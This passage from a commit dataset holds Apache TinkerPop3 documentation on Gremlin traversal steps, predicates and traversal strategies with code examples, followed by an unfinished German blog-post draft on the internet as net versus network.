`unfold()` (*flatMap*) is an iterator, iterable, or map, then it is unrolled into a linear form. If not, then the object is simply emitted. Please see <<fold-step,`fold()`>>-step for the inverse behavior.\n\n[gremlin-groovy,modern]\n----\ng.V(1).out().fold().inject('gremlin',[1.23,2.34])\ng.V(1).out().fold().inject('gremlin',[1.23,2.34]).unfold()\n----\n\nNote that `unfold()` does not recursively unroll iterators. Instead, `repeat()` can be used to for recursive unrolling.\n\n[gremlin-groovy,modern]\n----\ninject(1,[2,3,[4,5,[6]]])\ninject(1,[2,3,[4,5,[6]]]).unfold()\ninject(1,[2,3,[4,5,[6]]]).repeat(unfold()).until(count(local).is(1)).unfold()\n----\n\n[[union-step]]\nUnion Step\n~~~~~~~~~~\n\nimage::union-step.png[width=650]\n\nThe `union()`-step (*branch*) supports the merging of the results of an arbitrary number of traversals. When a traverser reaches a `union()`-step, it is copied to each of its internal steps. The traversers emitted from `union()` are the outputs of the respective internal traversals.\n\n[gremlin-groovy,modern]\n----\ng.V(4).union(\n __.in().values('age'),\n out().values('lang'))\ng.V(4).union(\n __.in().values('age'),\n out().values('lang')).path()\n----\n\n[[valuemap-step]]\nValueMap Step\n~~~~~~~~~~~~~\n\nThe `valueMap()`-step yields a Map representation of the properties of an element.\n\n[gremlin-groovy,modern]\n----\ng.V().valueMap()\ng.V().valueMap('age')\ng.V().valueMap('age','blah')\ng.E().valueMap()\n----\n\nIt is important to note that the map of a vertex maintains a list of values for each key. The map of an edge or vertex-property represents a single property (not a list). The reason is that vertices in TinkerPop3 leverage <<vertex-properties,vertex properties>> which are support multiple values per key. Using the <<the-crew-toy-graph,\"The Crew\">> toy graph, the point is made explicit.\n\n[gremlin-groovy,theCrew]\n----\ng.V().valueMap()\ng.V().has('name','marko').properties('location')\ng.V().has('name','marko').properties('location').valueMap()\n----\n\nIf the `id`, `label`, `key`, and `value` of the `Element` is desired, then a boolean triggers its insertion into the returned map.\n\n[gremlin-groovy,theCrew]\n----\ng.V().hasLabel('person').valueMap(true)\ng.V().hasLabel('person').valueMap(true,'name')\ng.V().hasLabel('person').properties('location').valueMap(true)\n----\n\n[[vertex-steps]]\nVertex Steps\n~~~~~~~~~~~~\n\nimage::vertex-steps.png[width=350]\n\nThe vertex steps (*flatMap*) are fundamental to the Gremlin language. Via these steps, its possible to \"move\" on the graph -- i.e. traverse.\n\n* `out(string...)`: Move to the outgoing adjacent vertices given the edge labels.\n* `in(string...)`: Move to the incoming adjacent vertices given the edge labels.\n* `both(string...)`: Move to both the incoming and outgoing adjacent vertices given the edge labels.\n* `outE(string...)`: Move to the outgoing incident edges given the edge labels.\n* `inE(string...)`: Move to the incoming incident edges given the edge labels.\n* `bothE(string...)`: Move to both the incoming and outgoing incident edges given the edge labels.\n* `outV()`: Move to the outgoing vertex.\n* `inV()`: Move to the incoming vertex.\n* `bothV()`: Move to both vertices.\n* `otherV()` : Move to the vertex that was not the vertex that was moved from.\n\n[gremlin-groovy,modern]\n----\ng.V(4)\ng.V(4).outE() <1>\ng.V(4).inE('knows') <2>\ng.V(4).inE('created') <3>\ng.V(4).bothE('knows','created','blah')\ng.V(4).bothE('knows','created','blah').otherV()\ng.V(4).both('knows','created','blah')\ng.V(4).outE().inV() <4>\ng.V(4).out() <5>\ng.V(4).inE().outV()\ng.V(4).inE().bothV()\n----\n\n<1> All outgoing edges.\n<2> All incoming knows-edges.\n<3> All incoming created-edges.\n<4> Moving forward touching edges and vertices.\n<5> Moving forward only touching vertices.\n\n[[where-step]]\nWhere Step\n~~~~~~~~~~\n\nThe `where()`-step filters the current object based on either the object itself (`Scope.local`) or the path history of the object (`Scope.global`) (*filter*). This step is typically used in conjuction with either <<match-step,`match()`>>-step or <<select-step,`select()`>>-step, but can be used in isolation.\n\n[gremlin-groovy,modern]\n----\ng.V(1).as('a').out('created').in('created').where(neq('a')) <1>\ng.withSideEffect('a',['josh','peter']).V(1).out('created').in('created').values('name').where(within('a')) <2>\ng.V(1).out('created').in('created').where(out('created').count().is(gt(1))).values('name') <3>\n----\n\n<1> Who are marko's collaborators, where marko can not be his own collaborator? (predicate)\n<2> Of the co-creators of marko, only keep those whose name is josh or peter. (using a sideEffect)\n<3> Which of marko's collaborators have worked on more than 1 project? (using a traversal)\n\nIMPORTANT: Please see <<using-where-with-match,`match().where()`>> and <<using-where-with-select,`select().where()`>> for how `where()` can be used in conjunction with `Map<String,Object>` projecting steps -- i.e. `Scope.local`.\n\nA few more examples of filtering an arbitrary object based on a anonymous traversal is provided below.\n\n[gremlin-groovy,modern]\n----\ng.V().where(out('created')).values('name') <1>\ng.V().out('knows').where(out('created')).values('name') <2>\ng.V().where(out('created').count().is(gte(2))).values('name') <3>\ng.V().where(out('knows').where(out('created'))).values('name') <4>\ng.V().where(__.not(out('created'))).where(__.in('knows')).values('name') <5>\ng.V().where(__.not(out('created')).and().in('knows')).values('name') <6>\n----\n\n<1> What are the names of the people who have created a project?\n<2> What are the names of the people that are known by someone one and have created a project?\n<3> What are the names of the people how have created two or more projects?\n<4> What are the names of the people who know someone that has created a project? (This only works in OLTP -- see the `WARNING` below)\n<5> What are the names of the people who have not created anything, but are known by someone?\n<6> The concatenation of `where()`-steps is the same as a single `where()`-step with an and'd clause.\n\nWARNING: The anonymous traversal of `where()` processes the current object \"locally\". In OLAP, where the atomic unit of computing is the the vertex and its local \"star graph,\" it is important that the anonymous traversal does not leave the confines of the vertex's star graph. In other words, it can not traverse to an adjacent vertex's properties or edges.\n\n[[a-note-on-predicates]]\nA Note on Predicates\n--------------------\n\nA `P` is a predicate of the form `Function<Object,Boolean>`. That is, given some object, return true or false. The provided predicates are outlined in the table below and are used in various steps such as <<has-step,`has()`>>-step, <<where-step,`where()`>>-step, <<is-step,`is()`>>-step, etc.\n\n[width=\"100%\",cols=\"3,15\",options=\"header\"]\n|=========================================================\n| Predicate | Description\n| `eq(object)` | Is the incoming object equal to the provided object?\n| `neq(object)` | Is the incoming object not equal to the provided object?\n| `lt(number)` | Is the incoming number less than the provided number?\n| `lte(number)` | Is the incoming number less than or equal to the provided number?\n| `gt(number)` | Is the incoming number greater than the provided number?\n| `gte(number)` | Is the incoming number greater than or equal to the provided number?\n| `inside(number,number)` | Is the incoming number greater than the first provided number and less than the second?\n| `outside(number,number)` | Is the incoming number less than the first provided number and greater than the second?\n| `between(number,number)` | Is the incoming number greater than or equal to the first provided number and less than the second?\n| `within(objects...)` | Is the incoming object in the array of provided objects?\n| `without(objects...)` | Is the incoming object not in the array of the provided objects?\n|=========================================================\n\n[gremlin-groovy]\n----\neq(2)\nnot(neq(2)) <1>\nnot(within('a','b','c'))\nnot(within('a','b','c')).test('d') <2>\nnot(within('a','b','c')).test('a')\nwithin(1,2,3).and(not(eq(2))).test(3) <3>\ninside(1,4).or(eq(5)).test(3) <4>\ninside(1,4).or(eq(5)).test(5)\nbetween(1,2) <5>\nnot(between(1,2))\n----\n\n<1> The `not()` of a `P`-predicate is another `P`-predicate.\n<2> `P`-predicates are arguments to various steps which internally `test()` the incoming value.\n<3> `P`-predicates can be and'd together.\n<4> `P`-predicates can be or' together.\n<5> `and()` is a `P`-predicate and thus, a `P`-predicate can be composed of multiple `P`-predicates.\n\nFinally, note that <<where-step,`where()`>>-step takes a `P<String>`. The provided string value refers to a variable binding, not to the explicit string value.\n\n[gremlin-groovy,modern]\n----\ng.V().as('a').both().both().as('b').count()\ng.V().as('a').both().both().as('b').where('a',neq('b')).count()\n----\n\nNOTE: It is possible for vendors and users to extend `P` and provide new predicates. For instance, a `regex(pattern)` could be a vendor-specific `P`.\n\n[[a-note-on-barrier-steps]]\nA Note on Barrier Steps\n-----------------------\n\nimage:barrier.png[width=165,float=right] Gremlin is primarily a link:http:\/\/en.wikipedia.org\/wiki\/Lazy_evaluation[lazy], stream processing language. This means that Gremlin fully processes (to the best of its abilities) any traversers currently in the traversal pipeline before getting more data from the start\/head of the traversal. However, there are numerous situations in which a completely lazy computation is not possible (or impractical). When a computation is not lazy, a \"barrier step\" exists. There are three types of barriers:\n\n . `CollectingBarrierStep`: All of the traversers prior to the step are put into a collection and then processed in some way (e.g. ordered) prior to the collection being \"drained\" one-by-one to the next step. Examples include: <<order-step,`order()`>>, <<sample-step,`sample()`>>, <<aggregate-step,`aggregate()`>>, <<barrier-step,`barrier()`>>.\n . `ReducingBarrierStep`: All of the traversers prior to the step are processed by a reduce function and once all the previous traversers are processed, a single \"reduced value\" traverser is emitted to the next step. Examples include: <<fold-step,`fold()`>>, <<count-step,`count()`>>, <<sum-step,`sum()`>>, <<max-step,`max()`>>, <<min-step,`min()`>>.\n . `SupplyingBarrierStep`: All of the traversers prior to the step are iterated (no processing) and then some provided supplier yields a single traverser to continue to the next step. Examples include: <<cap-step,`cap()`>>.\n\nIn Gremlin OLAP (see <<traversalvertexprogram,`TraversalVertexProgram`>>), a barrier is introduced at the end of every <<vertex-steps,adjacent vertex step>>. This means that the traversal does its best to compute as much as possible at the current, local vertex. What is can't compute without referencing an adjacent vertex is aggregated into a barrier collection. When there are no more traversers at the local vertex, the barriered traversers are the messages that are propagated to remote vertices for further processing.\n\n[[a-note-on-lambdas]]\nA Note On Lambdas\n-----------------\n\nimage:lambda.png[width=150,float=right] A link:http:\/\/en.wikipedia.org\/wiki\/Anonymous_function[lambda] is a function that can be referenced by software and thus, passed around like any other piece of data. In Gremlin, lambdas make it possible to generalize the behavior of a step such that custom steps can be created (on-the-fly) by the user. However, it is advised to avoid using lambdas if possible.\n\n[gremlin-groovy,modern]\n----\ng.V().filter{it.get().value('name') == 'marko'}.\n flatMap{it.get().vertices(OUT,'created')}.\n map {it.get().value('name')} <1>\ng.V().has('name','marko').out('created').values('name') <2>\n----\n\n<1> A lambda-rich Gremlin traversal which should and can be avoided. (*bad*)\n<2> The same traversal (result), but without using lambdas. (*good*)\n\nGremlin attempts to provide the user a comprehensive collection of steps in the hopes that the user will never need to leverage a lambda in practice. It is advised that users only leverage a lambda if and only if there is no corresponding lambda-less step that encompasses the desired functionality. The reason being, lambdas can not be optimized by Gremlin's compiler strategies as they can not be programmatically inspected (see <<traversalstrategy,traversal strategies>>).\n\nIn many situations where a lambda could be used, either a corresponding step exists or a traversal can be provided in its place. A `TraversalLambda` behaves like a typical lambda, but it can be optimized and it yields less objects than the corresponding pure-lambda form.\n\n[gremlin-groovy,modern]\n----\ng.V().out().out().path().by {it.value('name')}.\n by {it.value('name')}.\n by {g.V(it).in('created').values('name').fold().next()} <1>\ng.V().out().out().path().by('name').\n by('name').\n by(__.in('created').values('name').fold()) <2>\n----\n\n<1> The length-3 paths have each of their objects transformed by a lambda. (*bad*)\n<2> The length-3 paths have their objects transformed by a lambda-less step and a traversal lambda. (*good*)\n\n[[traversalstrategy]]\nTraversalStrategy\n-----------------\n\nimage:traversal-strategy.png[width=125,float=right] A `TraversalStrategy` can analyze a `Traversal` and mutate the traversal as it deems fit. This is useful in multiple situations:\n\n * There is an application-level feature that can be embedded into the traversal logic (*decoration*).\n * There is a more efficient way to express the traversal at the TinkerPop3 level (*optimization*).\n * There is a more efficient way to express the traversal at the graph vendor level (*vendor optimization*).\n * There are are some final adjustments required before executing the traversal (*finalization*).\n * There are certain traversals that are not legal for the application or traversal engine (*verification*).\n\nA simple `OptimizationStrategy` is the `IdentityRemovalStrategy`.\n\n[source,java]\n----\npublic final class IdentityRemovalStrategy extends AbstractTraversalStrategy<TraversalStrategy.OptimizationStrategy> implements TraversalStrategy.OptimizationStrategy {\n\n private static final IdentityRemovalStrategy INSTANCE = new IdentityRemovalStrategy();\n\n private IdentityRemovalStrategy() {\n }\n\n @Override\n public void apply(final Traversal.Admin<?, ?> traversal) {\n if (!TraversalHelper.hasStepOfClass(IdentityStep.class, traversal))\n return;\n\n TraversalHelper.getStepsOfClass(IdentityStep.class, traversal).stream().forEach(identityStep -> {\n final Step<?, ?> previousStep = identityStep.getPreviousStep();\n if (!(previousStep instanceof EmptyStep) || identityStep.getLabels().isEmpty()) {\n ((IdentityStep<?>) identityStep).getLabels().forEach(previousStep::addLabel);\n traversal.removeStep(identityStep);\n }\n });\n }\n\n public static IdentityRemovalStrategy instance() {\n return INSTANCE;\n }\n}\n----\n\nThis strategy simply removes any `IdentityStep` steps in the Traversal as `aStep().identity().identity().bStep()` is equivalent to `aStep().bStep()`. For those traversal strategies that require other strategies to execute prior or post to the strategy, then the following two methods can be defined in `TraversalStrategy` (with defaults being an empty set). If the `TraversalStrategy` is in a particular traversal category (i.e. decoration, optimization, vendor-optimization, finalization, or verification), then priors and posts are only possible within the category.\n\n[source,java]\npublic Set<Class<? extends S>> applyPrior();\npublic Set<Class<? extends S>> applyPost();\n\nIMPORTANT: `TraversalStrategy` categories are sorted within their category and the categories are then executed in the following order: decoration, optimization, finalization, and verification. If a designed strategy does not fit cleanly into these categories, then it can implement `TraversalStrategy` and its prior and posts can reference strategies within any category.\n\nAn example of a `VendorOptimizationStrategy` is provided below.\n\n[source,groovy]\ng.V().has('name','marko')\n\nThe expression above can be executed in a `O(|V|)` or `O(log(|V|)` fashion in <<tinkergraph-gremlin,TinkerGraph>> depending on whether there is or is not an index defined for \"name.\"\n\n[source,java]\n----\npublic final class TinkerGraphStepStrategy extends AbstractTraversalStrategy<TraversalStrategy.VendorOptimizationStrategy> implements TraversalStrategy.VendorOptimizationStrategy {\n\n private static final TinkerGraphStepStrategy INSTANCE = new TinkerGraphStepStrategy();\n\n private TinkerGraphStepStrategy() {\n }\n\n @Override\n public void apply(final Traversal.Admin<?, ?> traversal) {\n if (traversal.getEngine().isComputer())\n return;\n\n final Step<?, ?> startStep = traversal.getStartStep();\n if (startStep instanceof GraphStep) {\n final GraphStep<?> originalGraphStep = (GraphStep) startStep;\n final TinkerGraphStep<?> tinkerGraphStep = new TinkerGraphStep<>(originalGraphStep);\n TraversalHelper.replaceStep(startStep, (Step) tinkerGraphStep, traversal);\n\n Step<?, ?> currentStep = tinkerGraphStep.getNextStep();\n while (currentStep instanceof HasContainerHolder) {\n ((HasContainerHolder) currentStep).getHasContainers().forEach(tinkerGraphStep::addHasContainer);\n currentStep.getLabels().forEach(tinkerGraphStep::addLabel);\n traversal.removeStep(currentStep);\n currentStep = currentStep.getNextStep();\n }\n }\n }\n\n public static TinkerGraphStepStrategy instance() {\n return INSTANCE;\n }\n}\n----\n\nThe traversal is redefined by simply taking a chain of `has()`-steps after `g.V()` (`TinkerGraphStep`) and providing them to `TinkerGraphStep`. Then its up to `TinkerGraphStep` to determine if an appropriate index exists. In the code below, review the `vertices()` method and note how if an index exists, for a particular `HasContainer`, then that index is first queried before the remaining `HasContainer` filters are serially applied. Given that the strategy uses non-TinkerPop3 provided steps, it should go into the `VendorOptimizationStrategy` category to ensure the added step does not corrupt the `OptimizationStrategy` strategies.\n\n[gremlin-groovy,modern]\n----\nt = g.V().has('name','marko'); null\nt.toString()\nt.iterate(); null\nt.toString()\n----\n\nCAUTION: The reason that `OptimizationStrategy` and `VendorOptimizationStrategy` are two different categories is that optimization strategies should only rewrite the traversal using TinkerPop3 steps. This ensures that the optimizations executed at the end of the optimization strategy round are TinkerPop3 compliant. From there, vendor optimizations can analyze the traversal and rewrite the traversal as desired using vendor specific steps (e.g. replacing `GraphStep.HasStep...HasStep` with `TinkerGraphStep`). If vendor's optimizations use vendor-specific steps and implement `OptimizationStrategy`, then other TinkerPop3 optimizations may fail to optimize the traversal or mis-understand the vendor-specific step behaviors (e.g. `VendorVertexStep extends VertexStep`) and yield incorrect semantics.\n\nA collection of useful `DecorationStrategy` strategies are provided with TinkerPop3 and are generally useful to end-users. The following sub-sections detail these strategies:\n\nElementIdStrategy\n~~~~~~~~~~~~~~~~~\n\n`ElementIdStrategy` provides control over element identifiers. Some Graph implementations, such as TinkerGraph, allow specification of custom identifiers when creating elements:\n\n[gremlin-groovy]\n----\ng = TinkerGraph.open().traversal()\nv = g.addV().property(id,'42a').next()\ng.V('42a')\n----\n\nOther `Graph` implementations, such as Neo4j, generate element identifiers automatically and cannot be assigned. As a helper, `ElementIdStrategy` can be used to make identifier assignment possible by using vertex and edge indicies under the hood.\n\n[gremlin-groovy]\n----\ngraph = Neo4jGraph.open('\/tmp\/neo4j')\nstrategy = ElementIdStrategy.build().create()\ng = GraphTraversalSource.build().with(strategy).create(graph)\ng.addV().property(id, '42a').id()\n----\n\nIMPORTANT: The key that is used to store the assigned identifier should be indexed in the underlying graph database. If it is not indexed, then lookups for the elements that use these identifiers will perform a linear scan.\n\nEventStrategy\n~~~~~~~~~~~~~\n\nThe purpose of the `EventStrategy` is to raise events to one or more `MutationListener` objects as changes to the underlying `Graph` occur within a `Traversal`. Such a strategy is useful for logging changes, triggering certain actions based on change, or any application that needs notification of some mutating operation during a `Traversal`. If the transaction is rolled back, the event queue is reset.\n\nThe following events are raised to the `MutationListener`:\n\n* New vertex\n* New edge\n* Vertex property changed\n* Edge property changed\n* Vertex property removed\n* Edge property removed\n* Vertex removed\n* Edge removed\n\nTo start processing events from a `Traversal` first implement the `MutationListener` interface. An example of this implementation is the `ConsoleMutationListener` which writes output to the console for each event. The following console session displays the basic usage:\n\n[gremlin-groovy]\n----\ngraph = TinkerFactory.createModern()\nl = new ConsoleMutationListener(graph)\nstrategy = EventStrategy.build().addListener(l).create()\ng = GraphTraversalSource.build().with(strategy).create(graph)\ng.addV('name','stephen')\ng.E().drop()\n----\n\nBy default, the `EventStrategy` is configured with an `EventQueue` that raises events as they occur within execution of a `Step`. As such, the final line of Gremlin execution that drops all edges shows a bit of an inconsistent count, where the removed edge count is accounted for after the event is raised. The strategy can also be configured with a `TransactionalEventQueue` that captures the changes within a transaction and does not allow them to fire until the transaction is committed.\n\nCAUTION: `EventStrategy` is not meant for usage in tracking global mutations across separate processes. In other words, a mutation in one JVM process is not raised as an event in a different JVM process. In addition, events are not raised when mutations occur outside of the `Traversal` context.\n\nPartitionStrategy\n~~~~~~~~~~~~~~~~~\n\nimage::partition-graph.png[width=325]\n\n`PartitionStrategy` partitions the vertices and edges of a graph into `String` named partitions (i.e. buckets, subgraphs, etc.). The idea behind `PartitionStrategy` is presented in the image above where each element is in a single partition (represented by its color). Partitions can be read from, written to, and linked\/joined by edges that span one or two partitions (e.g. a tail vertex in one partition and a head vertex in another).\n\nThere are three primary configurations in `PartitionStrategy`:\n\n. Partition Key - The property key that denotes a String value representing a partition.\n. Write Partition - A `String` denoting what partition all future written elements will be in.\n. Read Partitions - A `Set<String>` of partitions that can be read from.\n\nThe best way to understand `PartitionStrategy` is via example.\n\n[gremlin-groovy]\n----\ngraph = TinkerFactory.createModern()\nstrategyA = PartitionStrategy.build().partitionKey(\"_partition\").writePartition(\"a\").addReadPartition(\"a\").create()\nstrategyB = PartitionStrategy.build().partitionKey(\"_partition\").writePartition(\"b\").addReadPartition(\"b\").create()\ngA = GraphTraversalSource.build().with(strategyA).create(graph)\ngA.addV() \/\/ this vertex has a property of {_partition:\"a\"}\ngB = GraphTraversalSource.build().with(strategyB).create(graph)\ngB.addV() \/\/ this vertex has a property of {_partition:\"b\"}\ngA.V()\ngB.V()\n----\n\nPartitions may also extend to `VertexProperty` elements if the `Graph` can support meta-properties and if the `includeMetaProperties` value is set to `true` when the `PartitionStrategy` is built. The `partitionKey` will be stored in the meta-properties of the `VertexProperty` and blind the traversal to those properties. Please note that the `VertexProperty` will only be hidden by way of the `Traversal` itself. For example, calling `Vertex.property(k)` bypasses the context of the `PartitionStrategy` and will thus allow all properties to be accessed.\n\nBy writing elements to particular partitions and then restricting read partitions, the developer is able to create multiple graphs within a single address space. Moreover, by supporting references between partitions, it is possible to merge those multiple graphs (i.e. join partitions).\n\nReadOnlyStrategy\n~~~~~~~~~~~~~~~~\n\n`ReadOnlyStrategy` is largely self-explanatory. A `Traversal` that has this strategy applied will throw an `IllegalStateException` if the `Traversal` has any mutating steps within it.\n\nSubgraphStrategy\n~~~~~~~~~~~~~~~~\n\n`SubgraphStrategy` is quite similar to `PartitionStrategy` in that it restrains a `Traversal` to certain vertices and edges as determined by a `Traversal` criterion defined individually for each.\n\n[gremlin-groovy]\n----\ngraph = TinkerFactory.createModern()\nstrategy = SubgraphStrategy.build().edgeCriterion(hasId(8,9,10)).create()\ng = GraphTraversalSource.build().with(strategy).create(graph)\ng.V() \/\/ shows all vertices as no filter for vertices was specified\ng.E() \/\/ shows only the edges defined in the edgeCriterion\n----\n\nThis strategy is implemented such that the vertices attached to an `Edge` must both satisfy the `vertexCriterion` (if present) in order for the `Edge` to be considered a part of the subgraph.\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"e7b54eb31aad3d5a49f66ea553a5eeeef6d0ccdd","subject":"Update 2017-05-04-Netz-und-Netzwerk.adoc","message":"Update 2017-05-04-Netz-und-Netzwerk.adoc","repos":"backemulus\/backemulus.github.io,backemulus\/backemulus.github.io,backemulus\/backemulus.github.io,backemulus\/backemulus.github.io","old_file":"_posts\/2017-05-04-Netz-und-Netzwerk.adoc","new_file":"_posts\/2017-05-04-Netz-und-Netzwerk.adoc","new_contents":"# Netz und Netzwerk\n:hp-tags: netz, netzwerk,\n:published_at: 2017-05-04\n\nVERSP\u00c4TETER BEITRAG ZUR BLOGPARADE [<<footnote-1>>]\n\nSprach\u00fcblichkeiten entsprechen begriffsw\u00fcnschen selten; folgender wortgebrauch mag un\u00fcblich sein.\n\n\n### Netz\/Netzwerkstruktur\n\nDas netzwerk ist vernetzung im doppelsinn, unterscheidbar nach struktur- und proze\u00dfseite: die strukturseite bezeichnet die vernetzungsbedingungen, hier: die netzwerkstruktur; die proze\u00dfseite bezeichnet die sich durch vernetzung exekutierende netzstruktur, hier: netz.\n\nDie beobachtung des netzwerks leidet an einem unsch\u00e4rfeproblem, da jede struktur nur in seiner prozessierung beobachtbar ist und jeder proze\u00df nur als exekution einer struktur als proze\u00df erkennbar wird. Eine seite ist also nur durch die pr\u00e4supponierung der jeweils anderen beobachtbar. Wer das netz beobachtet (hei\u00dft: schaut, was das netz \u00bbmacht\u00ab, wie es sich \u00bbverh\u00e4lt\u00ab, also: wie es prozessiert) pr\u00e4supponiert eine sich darin exekutierende netzwerkstruktur, an welcher ver\u00e4nderungen des netzes me\u00dfbar sind; beschaut wird der wandel von strukturmomenten, also der wechsel von strukturvariablen (stukturindifferente ver\u00e4nderungen des netzes) wie die entwicklung der strukturkonstanten, an welchen das netz als netz einortbar ist; erst so werden fehler- und mangelerscheinungen, destruktion, konstruktion, etc. sichtbar. (Die struktur gibt also \u2013 nicht nur, aber auch \u2013 auskunft \u00fcber die funktion.) Auf der anderen seite kann die netzstruktur nur an der aktualisierung der struktur in der strukturexekution durch den proze\u00df, eine netzwerkstruktur als nur an den sich realisierenden netzen erkannt werden. Daf\u00fcr mu\u00df feststehen, was netz innerhalb des netzwerks ist, an dem die netzwerkstruktur erarbeitet werden kann.\n\nIn seiner gesamtheit ist das netzwerk nicht tiefenscharf beobachtbar.\n\n\n\n\n### Das Internet als Netz\n\nDas internet ist nun als netz oder als netzwerk beschreibbar. Ich pl\u00e4diere f\u00fcr letzteres, nachdem ich ersteres problematisiert habe:\n\nDas internet hat keine eigene struktur; eine netzwerkstruktur prozessiert im internet auf eine bestimmte (aber strukturvariable) weise: digital. Man f\u00fchrt gespr\u00e4che \u00fcber chatrooms oder videotelephonie, unterh\u00e4lt freundschaften \u00fcber internetportale oder liest blogs anstelle von zeitschriften; es ist netz innerhalb eines netzwerks: es ist (bspw.) massenmedium neben massenmedien, unter ver\u00e4nderten physikalsichen (aber eben nur physikalischen) bedingungen. Aus dieser perspektive sind die vernetzungstechniken des internets primitive kompensation: vernetzung unter erschwerten bedingungen, das internet aus anla\u00df vernetzung (und das meint hier vor allem: die bedingungen f\u00fcr kommunikation) trotz einschr\u00e4nkungen fortzuf\u00fchren. [Vgl. Kompensation und poetisches lesen] Dann bleibt fraglich, weshalb digitalit\u00e4t auch bei ausbleiben der einschr\u00e4nkungen weiter genutzt wird: warum chatten, wenn man sich doch treffen k\u00f6nnte? warum \u2026 \n\nMan vermutet verblendung und f\u00fcrchtet verfall. (\u00bbdigitale verhexung\u00ab sozusagen: \u00bbder teufel hat nicht viel zeit\u00ab [BL], so hat er flux das internet erfunden! \u2026) Diese\n\n\n\n### Das Internet als Netzwerk\n\n\nDas internet als netzwerk ist besondert durch die minimalit\u00e4t der netzwerkstruktur, also der bedingungen unter denen vernetzung stattfinden; die minimalbedingung des internetvernetzung ist (neben der digitalit\u00e4t): eine verbindung ben\u00f6tigt mindestens zwei adressen, die verbunden werden; oder: eine adresse ben\u00f6tigt mindestens eine gegenadresse, mit der sie verbunden wird. Das netzwerk internet h\u00e4lt eine regel am leben: vernetze! Hierdurch ist die proze\u00dfseite unbestimmt; dem proze\u00df ist es m\u00f6glich selbst substrukteren auszubilden, die wieder prozessualisiert werden, unter der einzigen bedingung, da\u00df die prozessualisierung der substruktur die netzwerkstruktur erf\u00fcllt: man denke an plattformen, die eigene .\n\nInsofern die netzwerkbedingungen des internets f\u00fcr jedes netzwerk grunds\u00e4tzlich sind, k\u00f6nnen auch andere netzwerkstrukturen sich im netzwerk internet prozessieren: z.b. massenmedien; auch diese arbeiten mit der verkn\u00fcpfung von adressen, nur sind massenmediale netzwerkstrukturen komplizierter (und starrer): so werden bestimmte adressen als zentraladressen privilegiert und nicht-zentrale adressen eingeschr\u00e4nkt, wodurch nicht-zentrale adressen in concreta ignoriert und nur noch als abstrakte adressen behandelt werden: der leser, der h\u00f6rer, der zuschauer vs. die ARD, die ZEIT, die Journalistin, etc. Ist das verh\u00e4ltnis _nicht-zentrale adresse -> zentrale-adresse_ qualitativ, ist das umgedrehte verh\u00e4ltnis _zentrale adresse -> nicht-zentrale adresse_ vor allem quantitativ: wer schaut, z\u00e4hlt nicht, nur das gen\u00fcgend m\u00fcssen schauen.\n\nDies ist auch im internet prozessierbar, weil trotz der rigorosen adressenhierarchie und einseitigkeit problemlos digitalisiert werden kann und zugleich auch die netzwerkstruktur des internets prozessiert. Diese ertragbarkeit ist allerdings einseitig, denn das internet behandelt adressen wie adressen, und mehr als eine solche steht auch einer zeitung nicht zu verf\u00fcgung; gegen die \u00bbprobleme\u00ab des internets werden von dieser seite dann auch vor allem \u00e4u\u00dfere regulierung vorgeschlagen: (massenmedialer) strukturerhalt durch aufkl\u00e4rung von menschen oder der integration bekannter selektionsmechanismen: ausschlu\u00df, hierarchisierung von aufmerksamkeit\u2026 F\u00fcr das internet gilt aber ein bekanntes faszinationsprinzip: stellste \u2019nen sockel mit rotem knopp in die l\u00fcneburgerheide, so wird scho irgendwann wer vorbeikommen, der den dr\u00fcckt; steht der gleiche sockel auf dem Alexanderplatz, verk\u00fcrzt sich die wartezeit; und stellste 100 solcher sockel auf den Alex, wirste vor\u2019m ersten dr\u00fccker mit\u2019m aufstelln nich\u2019 fertig\u2026\n\n\n\n\n\n\n\n\n\nhat sich ver\u00e4ndert, sondern \u00fcberhaupt das verh\u00e4ltnis: produktion\u2013publikation\u2013rezeption; was eben vom wechsel von handschriftliche auf buchdruckerische publikation sich nicht \u00e4nderte. \n\n\nAuch massenmediale verkn\u00fcpfung arbeitet mit adressen, allerdings k\u00f6nnen diese durch sehr starre (weil komplizierte) verkn\u00fcpfungstechniken und privilegierung einzelner adressen (one-to-many, many-to-one) die adressen in conreta ignorieren und und mit abstrakten adressen arbeiten: das ARD, aber \u203adie zuschauer des ARD\u2039 \u2013 die ZEIT, aber \u203adie leser der ZEIT\u2039 \u2026 Die abstrakten adressen wirken dann nur quantitativ: gen\u00fcgend leser, gen\u00fcgend zuschauer brauchts, wer da geht und wer da kommt, bleibt egal. Diese abstrakten adressen kann das internet nicht bilden, weil es eben nicht ein netz im netzwerk ist: eine abstrakte adresse ist nicht anw\u00e4hlbar; nur konkrete adressen sind zugelassen und jede adresse ist (gleichrangig) adresse; die ZEIT kann einen retweet nicht erzwingen, aber die 13-j\u00e4hrige sch\u00fclerin aus einem s\u00e4chsischen dorf einen Da\u00df das internet massenmedial mi\u00dfverstanden wird, liegt wohl h\u00e4ufig daran, da\u00df es schr\u00e4g zu den massenmedien steht: die versuchen \u00fcber das netzwerk internet das netzwerk massenmedium zu produzieren; das funktioniert nur eingeschr\u00e4nkt, so alle nicht-privilegierten adressen mitmachen; das internet bietet keinen sonderadressen, die publikationsmittel sind (ersteinmal) gleich verteilt und da nicht-privilegierte adressen im internet \u00fcberwiegen, ist verweigerung (extrem als \u00bbtrollen\u00ab) hoch wahrscheinlich. (Und wie reagiert die massenmediale logik auf diesen konflikt?: sie fordert die \u00fcbertragung der privilegierungs- und selektionskriterien: das problem mit dem internet l\u00e4ge in der flexibilit\u00e4t der bedingungslosigkeit der adressenbildung (jeder, soviele er will, unter jedem namen, etc.) und deren vernetzung; massenmedial ist das problem des internets das internet. (Man will also ein digitales massenmedium und denkt auch zugleich dauernd, damit h\u00e4tte sie es zu tun.)\n\n\n\nDas internet ist gepr\u00e4gt durch die bindung der vernetzungsstrukturen an bestehende netzmechaniken (also die regelung der adressenvergabe und adressenvernetzung ), wie anders herum die bindung der netzprozesse \u2013 wie adressen vergeben werden ist nicht unabh\u00e4ngig von den plattformen\n \nInternet ist nicht blo\u00df eine struktur Dies liegt an der doppelten elementarabh\u00e4ngigkeit des internets: das internet ist strukturabh\u00e4ngig von adressen und proze\u00dfabh\u00e4ngig von der vernetzung von adressen. Dies erlaubt eine doppelte freiheit: Zum einen ist gleich, welche adressen vernetzt werden, solange sie vernetzt werden, zum anderen ist gleich, wie vernetzt wird, solange adressen vernetzt werden. Die vernetzung kann dezentral oder zentral, unmittelbar (adresse\u2013adresse) oder mittelbar (adresse \u00fcber adresse zu adresse, und zwar bis ins extremste steigerbar), minimal oder maximal (mindestens zwei, nach oben offen) stattfinden; oder 